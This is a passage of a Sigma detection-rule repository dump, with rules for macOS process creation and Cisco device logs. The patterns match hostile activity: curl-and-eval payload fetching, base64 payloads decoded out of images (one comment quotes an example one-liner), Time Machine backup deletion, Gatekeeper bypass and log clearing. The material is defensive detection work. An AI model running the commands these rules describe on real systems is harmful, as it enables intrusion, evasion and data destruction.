    "content": "title: System Network Discovery - macOS\nid: 58800443-f9fc-4d55-ae0c-98a3966dfb97\nstatus: test\ndescription: Detects enumeration of local network configuration\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md\nauthor: remotephone, oscd.community\ndate: 2020-10-06\nmodified: 2024-08-29\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_1:\n        Image|endswith:\n            - '/arp'\n            - '/ifconfig'\n            - '/netstat'\n            - '/networksetup'\n            - '/socketfilterfw'\n    selection_2:\n        Image: '/usr/bin/defaults'\n        CommandLine|contains|all:\n            - '/Library/Preferences/com.apple.alf'\n            - 'read'\n    filter_main_wifivelocityd:\n        ParentImage|endswith: '/wifivelocityd'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_suspicious_applet_behaviour.yml",
    "content": "title: Osacompile Execution By Potentially Suspicious Applet/Osascript\nid: a753a6af-3126-426d-8bd0-26ebbcb92254\nstatus: test\ndescription: Detects a potentially suspicious applet or osascript executing \"osacompile\".\nreferences:\n    - https://redcanary.com/blog/mac-application-bundles/\nauthor: Sohan G (D4rkCiph3r), Red Canary (Idea)\ndate: 2023-04-03\ntags:\n    - attack.execution\n    - attack.t1059.002\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '/applet'\n            - '/osascript'\n        CommandLine|contains: 'osacompile'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_swvers_discovery.yml",
    "content": "title: System Information Discovery Using sw_vers\nid: 5de06a6f-673a-4fc0-8d48-bcfe3837b033\nstatus: test\ndescription: Detects the use of \"sw_vers\" for system information discovery\nreferences:\n    - https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior\n    - https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior\n    - https://ss64.com/osx/sw_vers.html\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-12-20\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    # VT Query: 'behavior_processes:\"sw_vers\" and (behavior_processes:\"-productVersion\" or behavior_processes:\"-productName\" or behavior_processes:\"-buildVersion\") tag:dmg p:5+'\n    selection_image:\n        Image|endswith: '/sw_vers'\n    selection_options:\n        CommandLine|contains:\n            - '-buildVersion'\n            - '-productName'\n            - '-productVersion'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml",
    "content": "title: User Added To Admin Group Via Sysadminctl\nid: 652c098d-dc11-4ba6-8566-c20e89042f2b\nrelated:\n    - id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b\n      type: obsolete\nstatus: test\ndescription: Detects attempts to create and add an account to the admin group via \"sysadminctl\"\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos\n    - https://ss64.com/osx/sysadminctl.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-03-19\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078.003\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        # Creates and adds new user to admin group\n        Image|endswith: '/sysadminctl'\n        CommandLine|contains|all:\n            - ' -addUser '\n            - ' -admin '\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml",
    "content": "title: Guest Account Enabled Via Sysadminctl\nid: d7329412-13bd-44ba-a072-3387f804a106\nstatus: test\ndescription: Detects attempts to enable the guest account using the sysadminctl utility\nreferences:\n    - https://ss64.com/osx/sysadminctl.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-02-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\n    - attack.t1078.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/sysadminctl'\n        CommandLine|contains|all:\n            # By default the guest account is not active\n            - ' -guestAccount'\n            - ' on'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_sysctl_discovery.yml",
    "content": "title: System Information Discovery Via Sysctl - MacOS\nid: 6ff08e55-ea53-4f27-94a1-eff92e6d9d5c\nstatus: test\ndescription: |\n    Detects the execution of \"sysctl\" with specific arguments that have been used by threat actors and malware. It provides system hardware information.\n    This process is primarily used to detect and avoid virtualization and analysis environments.\nreferences:\n    - https://www.loobins.io/binaries/sysctl/#\n    - https://evasions.checkpoint.com/techniques/macos.html\n    - https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/\n    - https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/\n    - https://objective-see.org/blog/blog_0x1E.html\n    - https://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior\n    - https://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior\nauthor: Pratinav Chandra\ndate: 2024-05-27\ntags:\n    - attack.defense-evasion\n    - attack.t1497.001\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '/sysctl'\n        - CommandLine|contains: 'sysctl'\n    selection_cmd:\n        CommandLine|contains:\n            - 'hw.'\n            - 'kern.'\n            - 'machdep.'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml",
    "content": "title: System Network Connections Discovery - MacOs\nid: 9a7a0393-2144-4626-9bf1-7c2f5a7321db\nstatus: test\ndescription: Detects usage of system utilities to discover system network connections\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2022-12-28\ntags:\n    - attack.discovery\n    - attack.t1049\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith:\n            - '/who'\n            - '/w'\n            - '/last'\n            - '/lsof'\n            - '/netstat'\n    condition: selection\nfalsepositives:\n    - Legitimate activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml",
    "content": "title: System Information Discovery Using System_Profiler\nid: 4809c683-059b-4935-879d-36835986f8cf\nstatus: test\ndescription: |\n    Detects the execution of \"system_profiler\" with specific \"Data Types\" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.\n    This process is primarily used for system information discovery. However, \"system_profiler\" can also be used to determine if virtualization software is being run for defense evasion purposes.\nreferences:\n    - https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html\n    - https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf\n    - https://ss64.com/mac/system_profiler.html\n    - https://objective-see.org/blog/blog_0x62.html\n    - https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/\n    - https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af\nauthor: Stephen Lincoln `@slincoln_aiq` (AttackIQ)\ndate: 2024-01-02\ntags:\n    - attack.discovery\n    - attack.defense-evasion\n    - attack.t1082\n    - attack.t1497.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '/system_profiler'\n        - CommandLine|contains: 'system_profiler'\n    selection_cmd:\n        # Note: This list is based on CTI reporting. Threat actors might use other data types. Please refer to https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af for a full list\n        CommandLine|contains:\n            - 'SPApplicationsDataType'\n            - 'SPHardwareDataType'\n            - 'SPNetworkDataType'\n            - 'SPUSBDataType'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml",
    "content": "title: System Shutdown/Reboot - MacOs\nid: 40b1fbe2-18ea-4ee7-be47-0294285811de\nstatus: test\ndescription: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md\nauthor: 'Igor Fits, Mikhail Larin, oscd.community'\ndate: 2020-10-19\nmodified: 2022-11-26\ntags:\n    - attack.impact\n    - attack.t1529\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/shutdown'\n            - '/reboot'\n            - '/halt'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_tail_base64_decode_from_image.yml",
    "content": "title: Potential Base64 Decoded From Images\nid: 09a910bf-f71f-4737-9c40-88880ba5913d\nstatus: test\ndescription: |\n    Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.\nreferences:\n    - https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior\n    - https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-12-20\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    # Example:  /bin/bash sh -c tail -c +21453 '/Volumes/Installer/Installer.app/Contents/Resources/workout-logo.jpeg' | base64 --decode > /tmp/54A0A2CD-FAD1-4D4D-AAF5-5266F6344ABE.zip\n    # VT Query: 'behavior_processes:\"tail\" (behavior_processes:\"jpeg\" or behavior_processes:\"jpg\" or behavior_processes:\"png\" or behavior_processes:\"gif\") behavior_processes:\"base64\" behavior_processes:\"--decode >\" and tag:dmg'\n    selection_image:\n        Image|endswith: '/bash'\n    selection_view:\n        CommandLine|contains|all:\n            - 'tail'\n            - '-c'\n    selection_b64:\n        CommandLine|contains|all:\n            - 'base64'\n            - '-d' # Also covers \"--decode\"\n            - '>'\n    selection_files:\n        CommandLine|contains:\n            - '.avif'\n            - '.gif'\n            - '.jfif'\n            - '.jpeg'\n            - '.jpg'\n            - '.pjp'\n            - '.pjpeg'\n            - '.png'\n            - '.svg'\n            - '.webp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml",
    "content": "title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS\nid: 452df256-da78-427a-866f-49fa04417d74\nstatus: test\ndescription: |\n    Detects deletion attempts of MacOS Time Machine backups via the native backup utility \"tmutil\".\n    An adversary may perform this action before launching a ransomware attack to prevent the victim from restoring their files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine\n    - https://www.loobins.io/binaries/tmutil/\nauthor: Pratinav Chandra\ndate: 2024-05-29\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_img:\n        - Image|endswith: '/tmutil'\n        - CommandLine|contains: 'tmutil'\n    selection_cmd:\n        CommandLine|contains: 'delete'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml",
    "content": "title: Time Machine Backup Disabled Via Tmutil - MacOS\nid: 2c95fa8a-8b8d-4787-afce-7117ceb8e3da\nstatus: test\ndescription: |\n    Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility \"tmutil\".\n    An attacker can use this to prevent backups from occurring.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine\n    - https://www.loobins.io/binaries/tmutil/\nauthor: Pratinav Chandra\ndate: 2024-05-29\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_img:\n        - Image|endswith: '/tmutil'\n        - CommandLine|contains: 'tmutil'\n    selection_cmd:\n        CommandLine|contains: 'disable'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml",
    "content": "title: New File Exclusion Added To Time Machine Via Tmutil - MacOS\nid: 9acf45ed-3a26-4062-bf08-56857613eb52\nstatus: test\ndescription: |\n    Detects the addition of a new file or path exclusion to MacOS Time Machine via the \"tmutil\" utility.\n    An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine\n    - https://www.loobins.io/binaries/tmutil/\nauthor: Pratinav Chandra\ndate: 2024-05-29\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_img:\n        - Image|endswith: '/tmutil'\n        - CommandLine|contains: 'tmutil'\n    selection_cmd:\n        CommandLine|contains: 'addexclusion'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml",
    "content": "title: Potential WizardUpdate Malware Infection\nid: f68c4a4f-19ef-4817-952c-50dce331f4b0\nstatus: test\ndescription: Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97\n    - https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset\n    - https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/\nauthor: Tim Rauch (rule), Elastic (idea)\ndate: 2022-10-17\ntags:\n    - attack.command-and-control\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1:\n        Image|endswith: '/sh'\n        CommandLine|contains|all:\n            - '=$(curl '\n            - 'eval'\n    selection_2:\n        Image|endswith: '/curl'\n        CommandLine|contains: '_intermediate_agent_'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml",
    "content": "title: Gatekeeper Bypass via Xattr\nid: f5141b6d-9f42-41c6-a7bf-2a780678b29b\nstatus: test\ndescription: Detects macOS Gatekeeper bypass via xattr utility\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/1fed40dc7e48f16ed44dcdd9c73b9222a70cca85/atomics/T1553.001/T1553.001.md\n    - https://www.loobins.io/binaries/xattr/\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2024-04-18\ntags:\n    - attack.defense-evasion\n    - attack.t1553.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/xattr'\n        CommandLine|contains|all:\n            - '-d'\n            - 'com.apple.quarantine'\n    condition: selection\nfalsepositives:\n    - Legitimate activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml",
    "content": "title: Potential XCSSET Malware Infection\nid: 47d65ac0-c06f-4ba2-a2e3-d263139d0f51\nstatus: test\ndescription: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08\n    - https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset\nauthor: Tim Rauch (rule), Elastic (idea)\ndate: 2022-10-17\ntags:\n    - attack.command-and-control\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1_curl:\n        ParentImage|endswith: '/bash'\n        Image|endswith: '/curl'\n        CommandLine|contains:\n            - '/sys/log.php'\n            - '/sys/prepod.php'\n            - '/sys/bin/Pods'\n    selection_1_https:\n        CommandLine|contains: 'https://'\n    selection_other_1:\n        ParentImage|endswith: '/bash'\n        Image|endswith: '/osacompile'\n        CommandLine|contains|all:\n            - '/Users/'\n            - '/Library/Group Containers/'\n    selection_other_2:\n        ParentImage|endswith: '/bash'\n        Image|endswith: '/plutil'\n        CommandLine|contains|all:\n            - 'LSUIElement'\n            - '/Users/'\n            - '/Library/Group Containers/'\n    selection_other_3:\n        Image|endswith: '/zip'\n        CommandLine|contains|all:\n            - '-r'\n            - '/Users/'\n            - '/Library/Group Containers/'\n    condition: all of selection_1_* or 1 of selection_other_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_clear_logs.yml",
    "content": "title: Cisco Clear Logs\nid: ceb407f6-8277-439b-951f-e4210e3ed956\nstatus: test\ndescription: Clear command history in network OS which is used for defense evasion\nreferences:\n    - https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html\n    - https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'clear logging'\n        - 'clear archive'\n    condition: keywords\nfalsepositives:\n    - Legitimate administrators may run these commands\nlevel: high\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_collect_data.yml",
    "content": "title: Cisco Collect Data\nid: cd072b25-a418-4f98-8ebc-5093fb38fe1a\nstatus: test\ndescription: Collect pertinent data from the configuration files\nreferences:\n    - https://blog.router-switch.com/2013/11/show-running-config/\n    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm\n    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html\nauthor: Austin Clark\ndate: 2019-08-11\nmodified: 2023-01-04\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.collection\n    - attack.t1087.001\n    - attack.t1552.001\n    - attack.t1005\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'show running-config'\n        - 'show startup-config'\n        - 'show archive config'\n        - 'more'\n    condition: keywords\nfalsepositives:\n    - Commonly run by administrators\nlevel: low\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_crypto_actions.yml",
    "content": "title: Cisco Crypto Commands\nid: 1f978c6a-4415-47fb-aca5-736a44d7ca3d\nstatus: test\ndescription: Show when private keys are being exported from the device, or when new certificates are installed\nreferences:\n    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-01-04\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1553.004\n    - attack.t1552.004\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'crypto pki export'\n        - 'crypto pki import'\n        - 'crypto pki trustpoint'\n    condition: keywords\nfalsepositives:\n    - Not commonly run by administrators. Also whitelist your known good certificates\nlevel: high\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_disable_logging.yml",
    "content": "title: Cisco Disabling Logging\nid: 9e8f6035-88bf-4a63-96b6-b17c0508257e\nstatus: test\ndescription: Turn off logging locally or remotely\nreferences:\n    - https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf\nauthor: Austin Clark\ndate: 2019-08-11\nmodified: 2023-01-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'no logging'\n        - 'no aaa new-model'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_discovery.yml",
    "content": "title: Cisco Discovery\nid: 9705a6a1-6db6-4a16-a987-15b7151e299b\nstatus: test\ndescription: Find information about network devices that is not stored in config files\nreferences:\n    - https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-01-04\ntags:\n    - attack.discovery\n    - attack.t1083\n    - attack.t1201\n    - attack.t1057\n    - attack.t1018\n    - attack.t1082\n    - attack.t1016\n    - attack.t1049\n    - attack.t1033\n    - attack.t1124\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'dir'\n        - 'show arp'\n        - 'show cdp'\n        - 'show clock'\n        - 'show ip interface'\n        - 'show ip route'\n        - 'show ip sockets'\n        - 'show processes'\n        - 'show ssh'\n        - 'show users'\n        - 'show version'\n    condition: keywords\nfalsepositives:\n    - Commonly used by administrators for troubleshooting\nlevel: low\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_dos.yml",
    "content": "title: Cisco Denial of Service\nid: d94a35f0-7a29-45f6-90a0-80df6159967c\nstatus: test\ndescription: Detect a system being shutdown or put into different boot mode\nauthor: Austin Clark\ndate: 2019-08-15\nmodified: 2023-01-04\ntags:\n    - attack.impact\n    - attack.t1495\n    - attack.t1529\n    - attack.t1565.001\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'shutdown'\n        - 'config-register 0x2100'\n        - 'config-register 0x2142'\n    condition: keywords\nfalsepositives:\n    - Legitimate administrators may run these commands, though rarely.\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_file_deletion.yml",
    "content": "title: Cisco File Deletion\nid: 71d65515-c436-43c0-841b-236b1f32c21e\nstatus: test\ndescription: See what files are being deleted from flash file systems\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-01-04\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1070.004\n    - attack.t1561.001\n    - attack.t1561.002\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'erase'\n        - 'delete'\n        - 'format'\n    condition: keywords\nfalsepositives:\n    - Will be used sometimes by admins to clean up local flash space\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_input_capture.yml",
    "content": "title: Cisco Show Commands Input\nid: b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b\nstatus: test\ndescription: See what commands are being input into the device by other people, full credentials can be in the history\nauthor: Austin Clark\ndate: 2019-08-11\nmodified: 2023-01-04\ntags:\n    - attack.credential-access\n    - attack.t1552.003\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'show history'\n        - 'show history all'\n        - 'show logging'\n    condition: keywords\nfalsepositives:\n    - Not commonly run by administrators, especially if remote logging is configured\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_local_accounts.yml",
    "content": "title: Cisco Local Accounts\nid: 6d844f0f-1c18-41af-8f19-33e7654edfc3\nstatus: test\ndescription: Find local accounts being created or modified as well as remote authentication configurations\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-01-04\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1136.001\n    - attack.t1098\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'username'\n        - 'aaa'\n    condition: keywords\nfalsepositives:\n    - When remote authentication is in place, this should not change often\nlevel: high\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_modify_config.yml",
    "content": "title: Cisco Modify Configuration\nid: 671ffc77-50a7-464f-9e3d-9ea2b493b26b\nstatus: test\ndescription: Modifications to a config that will serve an adversary's impacts or persistence\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2025-04-28\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.impact\n    - attack.t1490\n    - attack.t1505\n    - attack.t1565.002\n    - attack.t1053\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'ip http server'\n        - 'ip https server'\n        - 'kron policy-list'\n        - 'kron occurrence'\n        - 'policy-list'\n        - 'access-list'\n        - 'ip access-group'\n        - 'archive maximum'\n        - 'ntp server'\n    condition: keywords\nfalsepositives:\n    - Legitimate administrators may run these commands\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_moving_data.yml",
    "content": "title: Cisco Stage Data\nid: 5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59\nstatus: test\ndescription: Various protocols may be used to put data on the device for exfil or infil\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-01-04\ntags:\n    - attack.collection\n    - attack.lateral-movement\n    - attack.command-and-control\n    - attack.exfiltration\n    - attack.t1074\n    - attack.t1105\n    - attack.t1560.001\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'tftp'\n        - 'rcp'\n        - 'puts'\n        - 'copy'\n        - 'configure replace'\n        - 'archive tar'\n    condition: keywords\nfalsepositives:\n    - Generally used to copy configs or IOS images\nlevel: low\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_net_sniff.yml",
    "content": "title: Cisco Sniffing\nid: b9e1f193-d236-4451-aaae-2f3d2102120d\nstatus: test\ndescription: Show when a monitor or a span/rspan is setup or modified\nauthor: Austin Clark\ndate: 2019-08-11\nmodified: 2023-01-04\ntags:\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1040\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'monitor capture point'\n        - 'set span'\n        - 'set rspan'\n    condition: keywords\nfalsepositives:\n    - Admins may setup new or modify old spans, or use a monitor for troubleshooting\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml",
    "content": "title: Cisco BGP Authentication Failures\nid: 56fa3cd6-f8d6-4520-a8c7-607292971886\nstatus: test\ndescription: Detects BGP failures which may be indicative of brute force attacks to manipulate routing\nreferences:\n    - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf\nauthor: Tim Brown\ndate: 2023-01-09\nmodified: 2023-01-23\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.collection\n    - attack.t1078\n    - attack.t1110\n    - attack.t1557\nlogsource:\n    product: cisco\n    service: bgp\n    definition: 'Requirements: cisco bgp logs need to be enabled and ingested'\ndetection:\n    keywords_bgp_cisco:\n        '|all':\n            - ':179' # Protocol\n            - 'IP-TCP-3-BADAUTH'\n    condition: keywords_bgp_cisco\nfalsepositives:\n    - Unlikely. Except due to misconfigurations\nlevel: low\n"
  },
  {
    "path": "rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml",
    "content": "title: Cisco LDP Authentication Failures\nid: 50e606bf-04ce-4ca7-9d54-3449494bbd4b\nstatus: test\ndescription: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels\nreferences:\n    - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf\nauthor: Tim Brown\ndate: 2023-01-09\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.collection\n    - attack.t1078\n    - attack.t1110\n    - attack.t1557\nlogsource:\n    product: cisco\n    service: ldp\n    definition: 'Requirements: cisco ldp logs need to be enabled and ingested'\ndetection:\n    selection_protocol:\n        - 'LDP'\n    selection_keywords:\n        - 'SOCKET_TCP_PACKET_MD5_AUTHEN_FAIL'\n        - 'TCPMD5AuthenFail'\n    condition: selection_protocol and selection_keywords\nfalsepositives:\n    - Unlikely. Except due to misconfigurations\nlevel: low\n"
  },
  {
    "path": "rules/network/dns/net_dns_external_service_interaction_domains.yml",
